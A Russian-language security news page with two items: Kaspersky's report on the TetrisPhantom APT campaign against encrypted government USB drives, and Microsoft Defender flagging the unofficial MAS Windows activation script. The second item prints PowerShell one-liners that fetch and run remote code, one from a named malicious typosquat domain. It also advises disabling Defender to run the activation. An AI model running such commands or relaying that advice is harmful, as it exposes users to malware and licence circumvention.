Кибершпионы крадут данные с защищённых USB-накопителей в госсистемах

Кибершпионы крадут данные с защищённых USB-накопителей в госсистемах

Кибершпионы крадут данные с защищённых USB-накопителей в госсистемах

Исследователи из «Лаборатории Касперского» выявили APT-кампанию, нацеленную на кражу конфиденциальных данных с защищенных USB-накопителей, используемых госструктурами.

Злоумышленники используют различные вредоносные инструменты и модули, с помощью которых можно запускать процессы, выполнять команды, взаимодействовать с файловой системой, собирать данные и передавать их на другие машины с помощью тех же или других защищённых USB-носителей.

«Наше расследование выявило высокий уровень сложности данной кампании, так как в ней использовались такие техники, как программная обфускация через виртуализацию, низкоуровневое общение с USB-накопителями и самораспространение через подключённые защищённые USB, — комментирует Нушин Шабаб, эксперт Глобального центра исследований и анализа угроз (GReAT). — Данная кибератака проводилась высококвалифицированными злоумышленниками, проявляющими интерес к шпионской деятельности в правительственных сетях».

Атакуемые USB-накопители используют аппаратное шифрование и применяются в госсекторе по всему миру, однако киберкампания, нареченная TetrisPhantom, пока ограничена Азиатско-Тихоокеанским регионом. Более подробную информацию о TetrisPhantom эксперты обещают представить на саммите аналитиков безопасности (SAS), который пройдёт с 25 по 28 октября.

«Сегодня даже самые сложные и защищенные системы открываются под натиском социальной инженерии, — отметил, пользуясь случаем, руководитель группы защиты инфраструктурных ИТ-решений компании «Газинформсервис» Сергей Полунин. — Как бы хороша не была система защиты, если заставить пользователя ее отключить или просто нарушить правила эксплуатации, толку от нее не будет. Так же и в случае с защищенными USB: если заставить пользователя сделать какие-то действия, когда USB носитель вставлен в компьютер и доступ к данным сохраняется, то можно вытащить их без каких-то дополнительных сложностей».

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru